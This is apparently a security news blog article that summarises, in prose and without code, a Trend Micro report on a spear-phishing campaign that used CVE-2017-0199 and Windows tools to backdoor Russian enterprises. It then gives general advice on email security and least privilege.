Why phish when you can spear phish? According to Trend Micro, this appears to be the purpose behind a recent set of malicious emails aimed at Russian enterprises. Attackers used a combination of highly specific, socially persuasive emails to breach corporate security and then leverage existing Windows protocols to create persistent backdoors.

When successful, cybercriminals gained the ability to download and delete files, download new scripts, terminate current scripts and run shell commands. This begs the question: How can enterprises sidestep the spear and make sure employees don’t get phished?

Backdoor Break-Ins

As noted by the Trend Micro piece, malicious actors used a combination of existing exploits and legitimate Windows functions to create a reliable and sophisticated backdoor system. Researchers observed at least five runs of emails occurring from June 23 to July 27 this year. Each run sent multiple emails per target, using different emails for each run and for each target.

Infections began with emails that appeared to be from sales or billing departments with subject lines such as “rules for connecting to the gateway” or “payment of state duties.” The emails contained a legitimate-looking .doc attachment, which was actually a customized rich text format (RTF) file that leveraged known exploit CVE-2017-0199, part of Microsoft Office’s Windows Object Linking and Embedding (OLE) interface.

This exploit let threat actors download a fake Excel spreadsheet that’s actually treated like an HTML application embedded with malicious JavaScript. It then ran two PowerShell scripts, one decoy and one that grabbed a DLL file. This file then dropped another file in the %AppData% folder with a .txt extension, but it was actually a scriptlet file loaded with more JavaScript.

The new file used Regsvr32 to bypass restrictions on running scripts and evade whitelisting protocols. Finally, another XML file was downloaded to serve as the primary backdoor.

Sound convoluted? It is — and purposefully so. The combination of continued obfuscation and abuse of legitimate command structures makes it extremely difficult to detect this malware in progress or remove backdoor code once it’s embedded in the system.

Staying Safe From Malicious Emails

While late-chain functions of this backdoor campaign are hard to detect — let alone stop — most phishing and spear phishing attacks start the same way: malicious emails.

For many enterprises, it’s tempting to view email security as something so basic, so necessary and so frequently addressed that employees couldn’t possibly allow cybercriminals to gain system access. According to CNN, however, a self-described email prankster managed to fool multiple employees of the U.S. government by posing as high-profile individuals. While no state secrets were spilled or networks breached, the prank shows just how easily legitimate-looking emails can slip past staff.

So how can companies sidestep the spear? Start by warning staff never to open attachments they’re not 100 percent sure about, then follow up by enforcing strict patch management for Microsoft Office and turning off auto-run for .doc macros.

It’s also a good idea to ensure that users possess only the network privileges they need for day-to-day tasks. Organization should also blacklist specific command interpreters or rarely used applications. Trend Micro noted that this “could affect legitimate system functions,” but slightly compromised performance always outweighs persistent backdoors.

Malicious emails are spearing Russian enterprises. Stay safe by recognizing the telltale tip of the phishing spear, training employees to err on the side of caution, and taking steps to limit application and network permissions.

More from

Security Awareness Training 101: Which Employees Need It?

4 min read - To understand why you need cybersecurity awareness training, you must first understand employees' outsized roles in security breaches. “People remain — by far — the weakest link in an organization’s cybersecurity defenses,” noted Verizon on the release of their 2022 Data Breach Investigations Report (DBIR). They elaborate that 25% of all breaches covered in the report were the result of social engineering attacks, and when you add human errors and misuse of privilege, the human element accounts for 82% of…

4 min read

Beyond Requirements: Tapping the Business Potential of Data Governance and Security

3 min read - Doom and gloom. Fear, uncertainty and doubt. The "stick" versus the "carrot". What do these concepts have in common? They have often provided the primary motivation for organizations’ data governance and security strategies. For the enterprise, this mindset has perpetuated the idea that data governance, data security and data privacy are reactive cost centers existing due to externally imposed requirements or mandates. Yet, what if data governance and security practices could upend the prevailing paradigm and demonstrate direct business value?…

3 min read

Protecting Against Remote Monitoring and Management Phishing

3 min read - You use remote monitoring and management (RMM) software to closely monitor your cyber environment and keep your organization safe. But now cyber criminals are specifically targeting these tools, causing legitimate software to become a vulnerability. This is the latest type of attack in an increase in a recent trend of disruptive software supply chain attacks. The Cybersecurity and Infrastructure Security Agency (CISA) recently released an alert about the malicious use of legitimate remote monitoring and management (RMM) software. Last fall,…

3 min read

Secure-by-Design: Which Comes First, Code or Security?

4 min read - For years, developers and IT security teams have been at loggerheads. While developers feel security slows progress, security teams assert that developers sacrifice security priorities in their quest to accelerate production. This disconnect results in flawed software that is vulnerable to attack. While advocates for speed and security clash, consumers must often pay the price when threat actors strike. 48% of developers admitted they were still shipping code with vulnerabilities in 2022. It’s clearly time for a change. Many believe…

4 min read